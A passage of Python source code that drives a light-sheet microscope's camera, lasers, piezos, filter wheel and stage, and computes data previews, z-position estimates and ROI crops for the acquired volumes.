laser channels\r\n v[light_on_px:period_px - jitter_px,\r\n n2c[channel + '_TTL']] = 3\r\n v[light_on_px:period_px - jitter_px,\r\n n2c[channel + '_power']] = 4.5 * power / 100\r\n voltages.append(v)\r\n voltages = np.concatenate(voltages, axis=0)\r\n # Timing attributes:\r\n self.buffer_time_s = self.ao.p2s(voltages.shape[0])\r\n self.volumes_per_s = self.volumes_per_buffer / self.buffer_time_s\r\n return voltages\r\n\r\n def _plot_voltages(self):\r\n import matplotlib.pyplot as plt\r\n # Reverse lookup table; channel numbers to names:\r\n c2n = {v:k for k, v in self.names_to_voltage_channels.items()}\r\n for c in range(self.voltages.shape[1]):\r\n plt.plot(self.voltages[:, c], label=c2n.get(c, f'ao-{c}'))\r\n plt.legend(loc='upper right')\r\n xlocs, xlabels = plt.xticks()\r\n plt.xticks(xlocs, [self.ao.p2s(l) for l in xlocs])\r\n plt.ylabel('Volts')\r\n plt.xlabel('Seconds')\r\n plt.show()\r\n\r\n def _prepare_to_save(self, filename, folder_name, description, delay_s):\r\n def make_folders(folder_name):\r\n os.makedirs(folder_name)\r\n os.makedirs(folder_name + '\\data')\r\n os.makedirs(folder_name + '\\metadata')\r\n os.makedirs(folder_name + '\\preview') \r\n assert type(filename) is str\r\n if folder_name is None:\r\n folder_index = 0\r\n dt = datetime.strftime(datetime.now(),'%Y-%m-%d_%H-%M-%S')\r\n folder_name = dt + '_%03i_sols'%folder_index\r\n while os.path.exists(folder_name): # check overwriting\r\n folder_index +=1\r\n folder_name = dt + '_%03i_sols'%folder_index\r\n make_folders(folder_name)\r\n else:\r\n if not os.path.exists(folder_name): make_folders(folder_name)\r\n data_path = folder_name + '\\data\\\\' + filename\r\n metadata_path = folder_name + '\\metadata\\\\' + filename\r\n preview_path = folder_name + '\\preview\\\\' + filename\r\n self._save_metadata(filename, description, delay_s, metadata_path)\r\n return data_path, preview_path\r\n\r\n def _save_metadata(self, filename, description, delay_s, path):\r\n to_save = {\r\n 'Date':datetime.strftime(datetime.now(),'%Y-%m-%d'),\r\n 'Time':datetime.strftime(datetime.now(),'%H:%M:%S'),\r\n 'filename':filename,\r\n 'description':description,\r\n 'delay_s':delay_s,\r\n 'channels_per_slice':self.channels_per_slice,\r\n 'power_per_channel':self.power_per_channel,\r\n 'filter_wheel_position':self.filter_wheel_position,\r\n 'illumination_time_us':self.illumination_time_us,\r\n 'volumes_per_s':self.volumes_per_s,\r\n 'buffer_time_s':self.buffer_time_s,\r\n 'height_px':self.height_px,\r\n 'width_px':self.width_px,\r\n 'timestamp_mode':self.timestamp_mode,\r\n 'scan_step_size_px':self.scan_step_size_px,\r\n 'scan_step_size_um':calculate_scan_step_size_um(\r\n self.scan_step_size_px),\r\n 'slices_per_volume':self.slices_per_volume,\r\n 'scan_range_um': self.scan_range_um,\r\n 'volumes_per_buffer':self.volumes_per_buffer,\r\n 'focus_piezo_z_um':self.focus_piezo_z_um,\r\n 'XY_stage_position_mm':self.XY_stage_position_mm,\r\n 'preview_line_px':self.preview_line_px,\r\n 'preview_crop_px':self.preview_crop_px,\r\n 'MRR':MRR,\r\n 'Mtot':Mtot,\r\n 'tilt':tilt,\r\n 'sample_px_um':sample_px_um,\r\n 'voxel_aspect_ratio':calculate_voxel_aspect_ratio(\r\n self.scan_step_size_px),\r\n }\r\n with open(os.path.splitext(path)[0] + '.txt', 'w') as file:\r\n for k, v in to_save.items():\r\n file.write(k + ': ' + str(v) + '\\n')\r\n\r\n def _get_data_buffer(self, shape, dtype):\r\n while self.num_active_data_buffers >= self.max_data_buffers:\r\n time.sleep(1e-3) # 1.7ms min\r\n # Note: this does not actually allocate the memory. 
Allocation happens\r\n # during the first 'write' process inside camera.record_to_memory\r\n data_buffer = ct.SharedNDArray(shape, dtype)\r\n self.num_active_data_buffers += 1\r\n return data_buffer\r\n\r\n def _release_data_buffer(self, shared_numpy_array):\r\n assert isinstance(shared_numpy_array, ct.SharedNDArray)\r\n self.num_active_data_buffers -= 1\r\n\r\n def _get_preview_buffer(self, shape, dtype):\r\n while self.num_active_preview_buffers >= self.max_preview_buffers:\r\n time.sleep(1e-3) # 1.7ms min\r\n # Note: this does not actually allocate the memory. Allocation happens\r\n # during the first 'write' process inside camera.record_to_memory\r\n preview_buffer = ct.SharedNDArray(shape, dtype)\r\n self.num_active_preview_buffers += 1\r\n return preview_buffer\r\n\r\n def _release_preview_buffer(self, shared_numpy_array):\r\n assert isinstance(shared_numpy_array, ct.SharedNDArray)\r\n self.num_active_preview_buffers -= 1\r\n\r\n def apply_settings( # Must call before .acquire()\r\n self,\r\n channels_per_slice=None, # Tuple of strings\r\n power_per_channel=None, # Tuple of floats\r\n filter_wheel_position=None, # Int\r\n illumination_time_us=None, # Float\r\n height_px=None, # Int\r\n width_px=None, # Int\r\n timestamp_mode=None, # \"off\" or \"binary\" or \"binary+ASCII\"\r\n voxel_aspect_ratio=None, # Int\r\n scan_range_um=None, # Int or float\r\n volumes_per_buffer=None, # Int\r\n focus_piezo_z_um=None, # (Float, \"relative\" or \"absolute\")\r\n XY_stage_position_mm=None, # (Float, Float, \"relative\" or \"absolute\")\r\n max_bytes_per_buffer=None, # Int\r\n max_data_buffers=None, # Int\r\n max_preview_buffers=None, # Int\r\n preview_line_px=None, # Int\r\n preview_crop_px=None, # Int\r\n ):\r\n args = locals()\r\n args.pop('self')\r\n def settings_task(custody):\r\n custody.switch_from(None, to=self.camera) # Safe to change settings\r\n self._settings_applied = False # In case the thread crashes\r\n # Attributes must be set previously or currently:\r\n for k, v in args.items(): \r\n if v is not None:\r\n setattr(self, k, v) # A lot like self.x = x\r\n assert hasattr(self, k), (\r\n \"%s: attribute %s must be set at least once\"%(self.name, k))\r\n if height_px is not None or width_px is not None: # legalize first\r\n h_px, w_px = height_px, width_px\r\n if height_px is None: h_px = self.height_px\r\n if width_px is None: w_px = self.width_px\r\n self.height_px, self.width_px, self.roi_px = ( \r\n pco_edge42_cl.legalize_image_size(\r\n h_px, w_px, verbose=False))\r\n if voxel_aspect_ratio is not None or scan_range_um is not None:\r\n self.scan_step_size_px, self.slices_per_volume = (\r\n calculate_cuboid_voxel_scan(self.voxel_aspect_ratio,\r\n self.scan_range_um))\r\n self.scan_range_um = calculate_scan_range_um(\r\n self.scan_step_size_px, self.slices_per_volume)\r\n assert 0 <= self.scan_range_um <= 500 # optical limit\r\n memory_exceeded = self._check_memory()\r\n if memory_exceeded:\r\n custody.switch_from(self.camera, to=None)\r\n return\r\n # Send hardware commands, slowest to fastest:\r\n if XY_stage_position_mm is not None:\r\n assert XY_stage_position_mm[2] in ('relative', 'absolute')\r\n x, y = XY_stage_position_mm[0], XY_stage_position_mm[1]\r\n if XY_stage_position_mm[2] == 'relative':\r\n self.XY_stage.move_mm(x, y, block=False)\r\n if XY_stage_position_mm[2] == 'absolute':\r\n self.XY_stage.move_mm(x, y, relative=False, block=False)\r\n if filter_wheel_position is not None:\r\n self.filter_wheel.move(filter_wheel_position,\r\n speed=6,\r\n block=False)\r\n if 
focus_piezo_z_um is not None:\r\n assert focus_piezo_z_um[1] in ('relative', 'absolute')\r\n z = focus_piezo_z_um[0]\r\n if focus_piezo_z_um[1] == 'relative':\r\n self.focus_piezo.move_um(z, block=False)\r\n if focus_piezo_z_um[1] == 'absolute':\r\n self.focus_piezo.move_um(z, relative=False, block=False)\r\n if (height_px is not None or\r\n width_px is not None or\r\n illumination_time_us is not None):\r\n self.camera._disarm()\r\n self.camera._set_roi(self.roi_px) # height_px updated first\r\n self.camera._set_exposure_time_us(int( \r\n self.illumination_time_us + self.camera.rolling_time_us))\r\n self.camera._arm(self.camera._num_buffers)\r\n if timestamp_mode is not None:\r\n self.camera._set_timestamp_mode(timestamp_mode)\r\n check_write_voltages_thread = False\r\n if (channels_per_slice is not None or\r\n power_per_channel is not None or\r\n illumination_time_us is not None or\r\n voxel_aspect_ratio is not None or\r\n scan_range_um is not None or\r\n volumes_per_buffer is not None):\r\n for channel in self.channels_per_slice:\r\n assert channel in self.illumination_sources\r\n assert len(self.power_per_channel) == (\r\n len(self.channels_per_slice))\r\n for power in self.power_per_channel: assert 0 <= power <= 100\r\n assert type(self.volumes_per_buffer) is int\r\n assert self.volumes_per_buffer > 0\r\n self.camera.num_images = self.images # update attribute\r\n self.voltages = self._calculate_voltages()\r\n write_voltages_thread = ct.ResultThread(\r\n target=self.ao._write_voltages,\r\n args=(self.voltages,)).start()\r\n check_write_voltages_thread = True\r\n # Finalize hardware commands, fastest to slowest:\r\n if focus_piezo_z_um is not None:\r\n self.focus_piezo._finish_moving()\r\n self.focus_piezo_z_um = self.focus_piezo.z\r\n if filter_wheel_position is not None:\r\n self.filter_wheel._finish_moving()\r\n if XY_stage_position_mm is not None:\r\n self.XY_stage._finish_moving()\r\n self.XY_stage_position_mm = self.XY_stage.x, self.XY_stage.y\r\n if check_write_voltages_thread:\r\n write_voltages_thread.get_result()\r\n self._settings_applied = True\r\n custody.switch_from(self.camera, to=None) # Release camera\r\n settings_thread = ct.CustodyThread(\r\n target=settings_task, first_resource=self.camera).start()\r\n self.unfinished_tasks.put(settings_thread)\r\n return settings_thread\r\n\r\n def snoutfocus(self, filename=None, delay_s=None):\r\n def snoutfocus_task(custody):\r\n custody.switch_from(None, to=self.camera) # Safe to change settings\r\n if delay_s is not None:\r\n start_time = time.perf_counter()\r\n if delay_s > 3: # 3 seconds is def. 
enough time to focus\r\n                    time.sleep(delay_s - 3)\r\n            if not self._settings_applied:\r\n                print(\"\\n%s: ***WARNING*** -> settings not applied\"%self.name)\r\n                print(\"%s: -> please apply legal settings\"%self.name)\r\n                print(\"%s: (all arguments must be specified at least once)\"\r\n                      %self.name)\r\n                custody.switch_from(self.camera, to=None)\r\n                return\r\n            self._settings_applied = False # In case the thread crashes\r\n            # Record the settings we'll have to reset:\r\n            old_fw_pos = self.filter_wheel_position\r\n            old_images = self.camera.num_images\r\n            old_exp_us = self.camera.exposure_us\r\n            old_roi_px = self.camera.roi_px\r\n            old_timestamp = self.camera.timestamp_mode\r\n            old_voltages = self.voltages\r\n            # Get microscope settings ready to take our measurement:\r\n            self.filter_wheel.move(1, speed=6, block=False) # Empty slot\r\n            self.snoutfocus_controller.set_voltage(0, block=False) # fw slower\r\n            piezo_limit_v = 75 # 20 um for current piezo\r\n            piezo_step_v = 1 # 267 nm steps\r\n            piezo_voltages = np.arange(\r\n                0, piezo_limit_v + piezo_step_v, piezo_step_v)\r\n            images = len(piezo_voltages)\r\n            self.camera.num_images = images # update attribute\r\n            roi_px = {'left': 901, 'right': 1160, 'top': 901, 'bottom': 1148}\r\n            self.camera._disarm()\r\n            self.camera._set_roi(roi_px)\r\n            self.camera._set_exposure_time_us(100)\r\n            self.camera._set_timestamp_mode('off')\r\n            self.camera._arm(self.camera._num_buffers)\r\n            # Calculate voltages for the analog-out card:\r\n            exp_px = self.ao.s2p(1e-6*self.camera.exposure_us)\r\n            roll_px = self.ao.s2p(1e-6*self.camera.rolling_time_us)\r\n            jitter_px = max(self.ao.s2p(30e-6), 1)\r\n            piezo_settling_px = self.ao.s2p(0.000) # Not yet measured\r\n            period_px = (max(exp_px, roll_px, piezo_settling_px) + jitter_px)\r\n            n2c = self.names_to_voltage_channels # A temporary nickname\r\n            v_open_shutter = np.zeros((self.ao.s2p(5*1e-3), # Shutter open time\r\n                                       self.ao.num_channels), 'float64')\r\n            v_open_shutter[:, n2c['snoutfocus_shutter']] = 5\r\n            voltages = [v_open_shutter] # insert the shutter open array first\r\n            for piezo_voltage in piezo_voltages:\r\n                v = np.zeros((period_px, self.ao.num_channels), 'float64')\r\n                v[:, n2c['snoutfocus_shutter']] = 5\r\n                v[:roll_px, n2c['camera']] = 5\r\n                v[:, n2c['snoutfocus_piezo']] = (\r\n                    10 * (piezo_voltage / piezo_limit_v)) # 10 V\r\n                voltages.append(v)\r\n            voltages = np.concatenate(voltages, axis=0)\r\n            # Allocate memory and finalize microscope settings:\r\n            data_buffer = self._get_data_buffer(\r\n                (images, self.camera.height_px, self.camera.width_px), 'uint16')\r\n            self.snoutfocus_controller._finish_set_voltage(polling_wait_s=0)\r\n            self.filter_wheel._finish_moving()\r\n            # Take pictures while moving the snoutfocus piezo:\r\n            camera_thread = ct.ResultThread(\r\n                target=self.camera.record_to_memory,\r\n                kwargs={'allocated_memory': data_buffer,\r\n                        'software_trigger': False},).start()\r\n            self.ao.play_voltages(voltages, block=False) # Ends at 0 V\r\n            camera_thread.get_result()\r\n            # Start cleaning up after ourselves:\r\n            write_voltages_thread = ct.ResultThread(\r\n                target=self.ao._write_voltages,\r\n                args=(old_voltages,)).start()\r\n            self.filter_wheel.move(old_fw_pos, speed=6, block=False)\r\n            # Inspect the images to find/set best snoutfocus piezo position:\r\n            if np.max(data_buffer) < 5 * np.min(data_buffer):\r\n                print('\\n%s: WARNING snoutfocus laser intensity low:'%self.name)\r\n                print('%s: -> is the laser/shutter powered up?'%self.name)\r\n
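            # The brightest pixel in the stack marks best focus: axis 0 of\r\n            # np.unravel_index is the piezo-step (image) index, so scaling it\r\n            # by piezo_step_v recovers the corresponding piezo voltage:\r\n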
            v = piezo_step_v * np.unravel_index(\r\n                np.argmax(data_buffer), data_buffer.shape)[0]\r\n            if (v == 0 or v == piezo_limit_v):\r\n                print('\\n%s: WARNING snoutfocus piezo out of range!'%self.name)\r\n            self.snoutfocus_controller.set_voltage(v, block=False)\r\n            if self.verbose:\r\n                print('\\n%s: snoutfocus piezo voltage = %0.2f'%(self.name, v))\r\n            # Finish cleaning up after ourselves:\r\n            self.camera.num_images = old_images\r\n            self.camera._disarm()\r\n            self.camera._set_roi(old_roi_px)\r\n            self.camera._set_exposure_time_us(old_exp_us)\r\n            self.camera._set_timestamp_mode(old_timestamp)\r\n            self.camera._arm(self.camera._num_buffers)\r\n            self.snoutfocus_controller._finish_set_voltage(polling_wait_s=0)\r\n            self.filter_wheel._finish_moving()\r\n            write_voltages_thread.get_result()\r\n            self._settings_applied = True\r\n            # We might want to hold camera custody for a fixed amount of time:\r\n            if delay_s is not None:\r\n                while time.perf_counter() - start_time < delay_s:\r\n                    time.sleep(0.001)\r\n            custody.switch_from(self.camera, to=None)\r\n            if filename is not None:\r\n                if not os.path.exists('sols_snoutfocus'):\r\n                    os.makedirs('sols_snoutfocus')\r\n                path = 'sols_snoutfocus\\\\' + filename\r\n                if self.verbose:\r\n                    print(\"%s: saving '%s'\"%(self.name, path))\r\n                imwrite(path, data_buffer[:, np.newaxis, :, :], imagej=True)\r\n                if self.verbose: print(\"%s: done saving.\"%self.name)\r\n            self._release_data_buffer(data_buffer)\r\n        snoutfocus_thread = ct.CustodyThread(\r\n            target=snoutfocus_task, first_resource=self.camera).start()\r\n        self.unfinished_tasks.put(snoutfocus_thread)\r\n        return snoutfocus_thread\r\n\r\n    def acquire(self,             # 'tzcyx' format\r\n                filename=None,    # None = no save, same string = overwrite\r\n                folder_name=None, # None = new folder, same string = re-use\r\n                description=None, # Optional metadata description\r\n                delay_s=None,     # Optional time delay baked in + Snoutfocus\r\n                display=True):    # Optional turn off\r\n        delay_during_acquire = True # default apply delay_s during acquire task\r\n        if delay_s is not None and delay_s > 3:\r\n            self.snoutfocus(delay_s=delay_s) # Run snoutfocus for longer delays\r\n            delay_during_acquire = False # snoutfocus will apply the delay_s\r\n        def acquire_task(custody):\r\n            custody.switch_from(None, to=self.camera) # get camera\r\n            if not self._settings_applied:\r\n                print(\"\\n%s: ***WARNING*** -> settings not applied\"%self.name)\r\n                print(\"%s: -> please apply legal settings\"%self.name)\r\n                print(\"%s: (all arguments must be specified at least once)\"\r\n                      %self.name)\r\n                custody.switch_from(self.camera, to=None)\r\n                return\r\n            if delay_during_acquire and delay_s is not None:\r\n                time.sleep(delay_s) # simple but not 'us' precise\r\n            if filename is not None:\r\n                prepare_to_save_thread = ct.ResultThread(\r\n                    target=self._prepare_to_save,\r\n                    args=(filename, folder_name, description, delay_s)).start()\r\n            # We have custody of the camera so attribute access is safe:\r\n            vo = self.volumes_per_buffer\r\n            sl = self.slices_per_volume\r\n            ch = len(self.channels_per_slice)\r\n            h_px = self.height_px\r\n            w_px = self.width_px\r\n            s_px = self.scan_step_size_px\r\n            l_px = self.preview_line_px\r\n            c_px = self.preview_crop_px\r\n            ts = self.timestamp_mode\r\n            im = self.images\r\n            data_buffer = self._get_data_buffer((im, h_px, w_px), 'uint16')\r\n            # camera.record_to_memory() blocks, so we use a thread:\r\n            camera_thread = ct.ResultThread(\r\n                target=self.camera.record_to_memory,\r\n                kwargs={'allocated_memory': data_buffer,\r\n                        'software_trigger': False},).start()\r\n
            # Race condition: the camera starts with (typically 16) single\r\n            # frame buffers, which are filled by triggers from\r\n            # ao.play_voltages(). The camera_thread empties them, hopefully\r\n            # fast enough that we never run out. So far, the camera_thread\r\n            # seems to both start on time, and keep up reliably once it starts,\r\n            # but this could be fragile. The camera thread (effectively)\r\n            # acquires shared memory as it writes to the allocated buffer.\r\n            # On this machine the memory acquisition is faster than the camera\r\n            # (~4GB/s vs ~1GB/s) but this could also be fragile if another\r\n            # process interferes.\r\n            self.ao.play_voltages(block=False)\r\n            camera_thread.get_result()\r\n            custody.switch_from(self.camera, to=self.datapreview)\r\n            # Acquisition is 3D, but display and filesaving are 5D:\r\n            data_buffer = data_buffer.reshape(vo, sl, ch, h_px, w_px)\r\n            preview_shape = DataPreview.shape(\r\n                vo, sl, ch, h_px, w_px, s_px, l_px, c_px, ts)\r\n            preview_buffer = self._get_preview_buffer(preview_shape, 'uint16')\r\n            self.datapreview.get(data_buffer, s_px, l_px, c_px, ts,\r\n                                 allocated_memory=preview_buffer)\r\n            if display:\r\n                custody.switch_from(self.datapreview, to=self.display)\r\n                self.display.show_image(preview_buffer)\r\n                custody.switch_from(self.display, to=None)\r\n            else:\r\n                custody.switch_from(self.datapreview, to=None)\r\n            if filename is not None:\r\n                data_path, preview_path = prepare_to_save_thread.get_result()\r\n                if self.verbose:\r\n                    print(\"%s: saving '%s'\"%(self.name, data_path))\r\n                    print(\"%s: saving '%s'\"%(self.name, preview_path))\r\n                # TODO: consider putting FileSaving in a SubProcess\r\n                imwrite(data_path, data_buffer, imagej=True)\r\n                imwrite(preview_path, preview_buffer, imagej=True)\r\n                if self.verbose:\r\n                    print(\"%s: done saving.\"%self.name)\r\n            self._release_data_buffer(data_buffer)\r\n            self._release_preview_buffer(preview_buffer)\r\n            del preview_buffer\r\n        acquire_thread = ct.CustodyThread(\r\n            target=acquire_task, first_resource=self.camera).start()\r\n        self.unfinished_tasks.put(acquire_thread)\r\n        return acquire_thread\r\n\r\n    def finish_all_tasks(self):\r\n        collected_tasks = []\r\n        while True:\r\n            try:\r\n                th = self.unfinished_tasks.get_nowait()\r\n            except queue.Empty:\r\n                break\r\n            th.get_result()\r\n            collected_tasks.append(th)\r\n        return collected_tasks\r\n\r\n    def close(self):\r\n        if self.verbose: print(\"%s: closing...\"%self.name)\r\n        self.finish_all_tasks()\r\n        self.ao.close()\r\n        self.filter_wheel.close()\r\n        self.camera.close()\r\n        self.snoutfocus_controller.close()\r\n        self.focus_piezo.close()\r\n        self.XY_stage.close()\r\n        self.display.close()\r\n        if self.verbose: print(\"%s: done closing.\"%self.name)\r\n\r\n# SOLS definitions and API:\r\n\r\n# The chosen API (exposed via '.apply_settings()') forces the user to\r\n# select scan settings (via 'voxel_aspect_ratio' and 'scan_range_um') that are\r\n# then legalized to give integer pixel shears when converting the raw data to\r\n# the 'native' view data. This speeds up data processing and gives a natural or\r\n# 'native' view of the data ***without interpolation***. If necessary an expert\r\n# user can bypass these legalizers by directly setting the 'scan_step_size_px'\r\n# and 'scan_range_um' attributes after the last call to '.apply_settings()'.\r\n\r\n
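# Worked example of the legalizer arithmetic (using the optical constants at\r\n# the top of this file, i.e. tilt = 50 deg and sample_px_um ~= 0.22 um;\r\n# values are rounded for illustration):\r\n#   voxel_aspect_ratio=2 -> scan_step_size_px = round(2 / tan(50deg)) = 2\r\n#   -> scan_step_size_um = 2 * sample_px_um / cos(50deg) ~= 0.68 um\r\n#   scan_range_um=50     -> slices_per_volume = 1 + round(50 / 0.68) = 74\r\n# so the legalized scan range is 73 steps * 0.68 um ~= 49.8 um.\r\n\r\n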
def calculate_scan_step_size_um(scan_step_size_px):\r\n    return scan_step_size_px * sample_px_um / np.cos(tilt)\r\n\r\ndef calculate_scan_range_um(scan_step_size_px, slices_per_volume):\r\n    scan_step_size_um = calculate_scan_step_size_um(scan_step_size_px)\r\n    return scan_step_size_um * (slices_per_volume - 1)\r\n\r\ndef calculate_voxel_aspect_ratio(scan_step_size_px):\r\n    return scan_step_size_px * np.tan(tilt)\r\n\r\ndef calculate_cuboid_voxel_scan(voxel_aspect_ratio, scan_range_um):\r\n    scan_step_size_px = max(int(round(voxel_aspect_ratio / np.tan(tilt))), 1)\r\n    scan_step_size_um = calculate_scan_step_size_um(scan_step_size_px)\r\n    slices_per_volume = 1 + int(round(scan_range_um / scan_step_size_um))\r\n    return scan_step_size_px, slices_per_volume # watch out for fencepost!\r\n\r\nclass DataPreview:\r\n    # Returns 3 max intensity projections along the traditional XYZ axes. For\r\n    # speed (and simplicity) these are calculated to the nearest pixel (without\r\n    # interpolation) and should probably not be used for rigorous analysis.\r\n    @staticmethod\r\n    def shape(volumes_per_buffer,\r\n              slices_per_volume,\r\n              num_channels_per_slice, # = len(channels_per_slice)\r\n              height_px,\r\n              width_px,\r\n              scan_step_size_px,\r\n              preview_line_px,\r\n              preview_crop_px,\r\n              timestamp_mode):\r\n        # Calculate max pixel shear:\r\n        scan_step_size_um = calculate_scan_step_size_um(scan_step_size_px)\r\n        prop_px_per_scan_step = scan_step_size_um / ( # for an O1 axis view\r\n            sample_px_um * np.cos(tilt))\r\n        prop_px_shear_max = int(np.rint(\r\n            prop_px_per_scan_step * (slices_per_volume - 1)))\r\n        # Get image size with projections:\r\n        t_px, b_px = 2 * (preview_crop_px,) # crop top and bottom pixel rows\r\n        if timestamp_mode == \"binary+ASCII\": t_px = 8 # ignore timestamps\r\n        h_px = height_px - t_px - b_px\r\n        x_px = width_px\r\n        y_px = int(round((h_px + prop_px_shear_max) * np.cos(tilt)))\r\n        z_px = int(round(h_px * np.sin(tilt)))\r\n        shape = (volumes_per_buffer,\r\n                 num_channels_per_slice,\r\n                 y_px + z_px + 2 * preview_line_px,\r\n                 x_px + z_px + 2 * preview_line_px)\r\n        return shape\r\n\r\n    def get(self,\r\n            data, # raw 5D data, 'tzcyx' input -> 'tcyx' output\r\n            scan_step_size_px,\r\n            preview_line_px,\r\n            preview_crop_px,\r\n            timestamp_mode,\r\n            allocated_memory=None):\r\n        vo, slices, ch, h_px, w_px = data.shape\r\n        s_px, l_px, c_px = scan_step_size_px, preview_line_px, preview_crop_px\r\n        # Get preview shape and check allocated memory (or make new array):\r\n        preview_shape = self.shape(\r\n            vo, slices, ch, h_px, w_px, s_px, l_px, c_px, timestamp_mode)\r\n        if allocated_memory is not None:\r\n            assert allocated_memory.shape == preview_shape\r\n            return_value = None # use given memory and avoid return\r\n        else: # make new array and return\r\n            allocated_memory = np.zeros(preview_shape, 'uint16')\r\n            return_value = allocated_memory\r\n        t_px, b_px = 2 * (preview_crop_px,) # crop top and bottom pixel rows\r\n        if timestamp_mode == \"binary+ASCII\": t_px = 8 # ignore timestamps\r\n        prop_px = h_px - t_px - b_px # i.e. 
prop_px = h_px (with cropping)\r\n data = data[:, :, :, t_px:h_px - b_px, :]\r\n scan_step_size_um = calculate_scan_step_size_um(scan_step_size_px)\r\n # Calculate max px shear on the propagation axis for an 'O1' projection:\r\n # -> more shear than for a 'native' projection\r\n prop_px_per_scan_step = scan_step_size_um / ( # O1 axis view\r\n sample_px_um * np.cos(tilt))\r\n prop_px_shear_max = int(np.rint(prop_px_per_scan_step * (slices - 1)))\r\n # Calculate max px shear on the scan axis for a 'width' projection:\r\n scan_steps_per_prop_px = 1 / prop_px_per_scan_step # width axis view\r\n scan_px_shear_max = int(np.rint(scan_steps_per_prop_px * (prop_px - 1)))\r\n # Make projections:\r\n for v in range(vo):\r\n for c in range(ch):\r\n O1_proj = np.zeros(\r\n (prop_px + prop_px_shear_max, w_px), 'uint16')\r\n width_proj = np.zeros(\r\n (slices + scan_px_shear_max, prop_px), 'uint16')\r\n max_width = np.amax(data[v, :, c, :, :], axis=2)\r\n scan_proj = np.amax(data[v, :, c, :, :], axis=0)\r\n for i in range(slices):\r\n prop_px_shear = int(np.rint(i * prop_px_per_scan_step))\r\n target = O1_proj[prop_px_shear:prop_px + prop_px_shear, :]\r\n np.maximum(target, data[v, i, c, :, :], out=target)\r\n for i in range(prop_px):\r\n scan_px_shear = int(np.rint(i * scan_steps_per_prop_px))\r\n width_proj[scan_px_shear:slices + scan_px_shear, i] = (\r\n max_width[:, i])\r\n # Scale images according to pixel size (divide by X_px_um):\r\n X_px_um = sample_px_um # width axis\r\n Y_px_um = sample_px_um * np.cos(tilt) # prop. axis to scan axis\r\n Z_px_um = sample_px_um * np.sin(tilt) # prop. axis to O1 axis\r\n O1_img = zoom(O1_proj, (Y_px_um / X_px_um, 1))\r\n scan_img = zoom(scan_proj, (Z_px_um / X_px_um, 1))\r\n scan_scale = O1_img.shape[0] / width_proj.shape[0]\r\n # = scan_step_size_um / X_px_um rounded to match O1_img.shape[0]\r\n width_img = zoom(width_proj, (scan_scale, Z_px_um / X_px_um))\r\n # Make image with all projections and flip for traditional view:\r\n y_px, x_px = O1_img.shape\r\n line_min, line_max = O1_img.min(), O1_img.max()\r\n # Pass projections into allocated memory:\r\n m = allocated_memory # keep code short!\r\n m[v, c, l_px:y_px + l_px, l_px:x_px + l_px] = O1_img\r\n## m[v, c, y_px + 2*l_px:, l_px:x_px + l_px] = np.flipud(scan_img)\r\n m[v, c, y_px + 2*l_px:, l_px:x_px + l_px] = scan_img\r\n## m[v, c, l_px:y_px + l_px, x_px + 2*l_px:] = np.fliplr(width_img)\r\n m[v, c, l_px:y_px + l_px, x_px + 2*l_px:] = width_img\r\n m[v, c, y_px + 2*l_px:, x_px + 2*l_px:] = np.full(\r\n (scan_img.shape[0], width_img.shape[1]), 0)\r\n # Add line separations between projections:\r\n m[v, c, :l_px, :] = line_max\r\n m[v, c, :l_px, ::10] = line_min\r\n m[v, c, y_px + l_px:y_px + 2*l_px, :] = line_max\r\n m[v, c, y_px + l_px:y_px + 2*l_px, ::10] = line_min\r\n m[v, c, :, :l_px] = line_max\r\n m[v, c, ::10, :l_px] = line_min\r\n m[v, c, :, x_px + l_px:x_px + 2*l_px] = line_max\r\n m[v, c, ::10, x_px + l_px:x_px + 2*l_px] = line_min\r\n m[v, c, :] = np.flipud(m[v, c, :])\r\n return return_value\r\n\r\nclass DataZ:\r\n # Can be used to estimate the z location of the sample in um relative to\r\n # the lowest pixel (useful for software autofocus for example). 
Choose:\r\n    # - 'max_intensity' to track the brightest z pixel\r\n    # - 'max_gradient' as a proxy for the coverslip boundary\r\n    def estimate(\r\n        self,\r\n        preview_image, # 2D preview image: single volume, single channel\r\n        height_px,\r\n        width_px,\r\n        preview_line_px,\r\n        preview_crop_px,\r\n        timestamp_mode,\r\n        method='max_gradient',\r\n        gaussian_filter_std=3,\r\n        ):\r\n        assert method in ('max_intensity', 'max_gradient')\r\n        t_px, b_px = 2 * (preview_crop_px,) # crop top and bottom pixel rows\r\n        if timestamp_mode == \"binary+ASCII\": t_px = 8 # ignore timestamps\r\n        h_px = height_px - t_px - b_px\r\n        z_px = int(round(h_px * np.sin(tilt))) # DataPreview definition\r\n        inspect_me = preview_image[:z_px, preview_line_px:width_px]\r\n        intensity_line = np.average(inspect_me, axis=1)[::-1] # O1 -> coverslip\r\n        intensity_line_smooth = gaussian_filter1d(\r\n            intensity_line, gaussian_filter_std) # reject hot pixels\r\n        if method == 'max_intensity':\r\n            max_z_intensity_um = np.argmax(intensity_line_smooth) * sample_px_um\r\n            return max_z_intensity_um\r\n        intensity_gradient = np.zeros((len(intensity_line_smooth) - 1))\r\n        for px in range(len(intensity_line_smooth) - 1):\r\n            intensity_gradient[px] = (\r\n                intensity_line_smooth[px + 1] - intensity_line_smooth[px])\r\n        max_z_gradient_um = np.argmax(intensity_gradient) * sample_px_um\r\n        return max_z_gradient_um\r\n\r\nclass DataRoi:\r\n    # Can be used for cropping empty pixels from raw data. The SOLS microscope\r\n    # produces vast amounts of data very quickly, often with many empty\r\n    # pixels (so discarding them can help). This simple routine assumes a\r\n    # central sample/roi and then attempts to reject the surrounding empty\r\n    # pixels according to the 'signal_to_bg_ratio' (threshold method).\r\n    def get(\r\n        self,\r\n        data, # raw 5D data, 'tzcyx' input -> 'tzcyx' output\r\n        preview_crop_px,\r\n        timestamp_mode,\r\n        signal_to_bg_ratio=1.2, # adjust for threshold\r\n        gaussian_filter_std=3, # adjust for smoothing/hot pixel rejection\r\n        ):\r\n        vo, slices, ch, h_px, w_px = data.shape\r\n        t_px, b_px = 2 * (preview_crop_px,) # crop top and bottom pixel rows\r\n        if timestamp_mode == \"binary+ASCII\": t_px = 8 # ignore timestamps\r\n        min_index_vo, max_index_vo = [], []\r\n        for v in range(vo):\r\n            min_index_ch, max_index_ch = [], []\r\n            for c in range(ch):\r\n                # Max project volume to images:\r\n                width_projection = np.amax(\r\n                    data[v, :, c, t_px:h_px - b_px, :], axis=2)\r\n                scan_projection = np.amax(\r\n                    data[v, :, c, t_px:h_px - b_px, :], axis=0)\r\n                # Max project images to lines and smooth to reject hot pixels:\r\n                scan_line = gaussian_filter1d(\r\n                    np.max(width_projection, axis=1), gaussian_filter_std)\r\n                prop_line = gaussian_filter1d(\r\n                    np.max(scan_projection, axis=1), gaussian_filter_std)\r\n                width_line = gaussian_filter1d(\r\n                    np.max(scan_projection, axis=0), 